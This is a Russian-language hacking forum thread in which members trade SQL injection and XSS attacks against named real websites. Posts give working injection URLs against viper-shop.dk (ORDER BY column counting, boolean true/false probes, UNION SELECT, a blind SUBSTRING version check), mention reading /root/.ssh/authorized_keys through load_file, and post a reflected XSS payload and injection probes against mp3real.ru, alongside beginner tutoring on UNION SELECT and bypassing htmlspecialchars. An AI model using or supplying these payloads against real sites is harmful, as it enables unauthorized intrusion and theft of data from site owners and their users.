Ваши вопросы по уязвимостям.

чтото я не понял сути поста .. может мне тоже учится пойти надо...
кол-во колонок, обычно так ищут ..
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*
так что делаем вывод, 15 колонок .. можно в ошибке посмотреть кол-во колонок, но там не то колво, ибо c.*
вывода не добился..
лучше поискать на сайте ещё скули, возможно проще будет, ну или эту поковырять ещё ..

 

ну тогда зайди и посмотри вывод

и

отличается чем-то?
и вообще с чего вдруг взяли что там sql-inj?

 

вот эти два вывода разные:

Code:

http://www.viper-shop.dk/category.php?id=179'+AND+'1'='1
http://www.viper-shop.dk/category.php?id=179'+AND+'1'='0

инъекция там есть.

 

Там есть иньекция, но перебирать придется вслепую, так как там сложный запрос с left join, фильтр там /*

http://www.viper-shop.dk/category.php?id=180%27+union+select+1/*

потому что если подставить

http://www.viper-shop.dk/category.php?id=180%27+union+select+1--

то совсем другой рез-т. Т.е. с этой ссылкой надо поработать как с Blind SQL-inj

 

gisTy
читай мой пост! если скажешь что это не иньекция, то я сьем свой тапок!
http://www.viper-shop.dk/category.php?id=180'+order+by+15/*
и
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*

-------------
как сказал Pashkela, тут слепая иньекция, да ещё и 4ая ветка
http://www.viper-shop.dk/category.php?id=180'+AND+SUBSTRING((select+version()),1,1)='4
тк кк Access denied for user 'viper-shopdk'@'%' to database 'mysql' то тут надо перебирать таблы .. мне лень, еси кому то интересно - удачи ))

 

сори.. это я ступил малость..

 

Не могу окончательно понять понять что означает:
Пример:
union+select+1,3,4,5,6,7,8,9/*
union+select-(Выбрать из базы)
А что означают 1,2,3,4,5,6,7,8,9 Поля в таблице?

 

geforce, иди почитай
https://forum.antichat.ru/thread43966.html

 

Я уже милион раз читал это! Мне нуген ответ на вопрос

Вот запрос к базе пример:

PHP:

mysql_query (SELECT * FROM название таблицы)

когда я пишу union select 1,2,3,4,5,6,7,8,9 какую роль играют эти цыфры?

И вопрос:

Существует ли способ обойти функцыю htmlspecialchars(); если да то как?

 

2 geforce
значит прочитай ещё раз ..
там всё написано .. если сам поймёшь - значит действительно поймёшь .. а так, забудешь - на завтра.

 

Еще это следует почитать http://www.ipmce.su/~lib/osn_prav.html#0008

 

При чтении load_file-ом нашёл публичные ключи в ./root/.ssh/authorized_keys:

bЃ .authorized_keys.nV0WVg bЃ И
authorized_keys

Справа отчётливо имя файла authorized_keys,а слева что за херня ? Юзал SIPT 4.0

Система - FreeBSD

И ещё: кучу всякого в var/tmp валяется,включая идентификаторы сессий.

mysql-5.tgz к примеру.

 

Ну да, колонки в таблице.
Подбирать их следует, т.к. перед union есть опред. кол-во столбцов и после union - должно быть столько же.

 

Существует ли способ обойти функцыю htmlspecialchars(); если да то как?

 

А чё её обходить,если она и так не работает : DD

 

geforce

для хсс врятле обойдеш... скуля хз, помоему тоже..

есть тема уже, о ее безопастности )
https://forum.antichat.ru/showthread.php?t=64500

 

Если аргумент не в кавычках то скулю можно забомбить

 

Это кол-во полей, количество которых ты проверял к примеру так: +order+by+9/*
Цифра 9 - максимальное значание, при котором не вылетает ошибка мускуля. Значит пишешь +union+select+1,2,3,4,5,6,7,8,9/*
Если бы при 9 вылетала уже ошибка, а пк примеру при 5 нет... Значит будет 5 полей. То есть +union+select+1,2,3,4,5/*

 

Помоему на простые вопросы есть банально простой раздел... Может я ошибаюсь?

 

Помогите с интересным сайтом. это mp3real.ru. Дырявый, шопи**ец. Ничерта в поиске не фильтруется... нашел пассивную xss
http://www.mp3real.ru/search/?type=art&q="><script>alert()<script>
и нашел вроде бы sql inj , но не уверен. Если и скуль, то очень странный. Ошибку вызывает запрос
http://www.mp3real.ru/search/?type=art&q=<'' (две одиннарные)
Вопрос - как развернуть inj? У кого-нить есть предложения по этому поводу?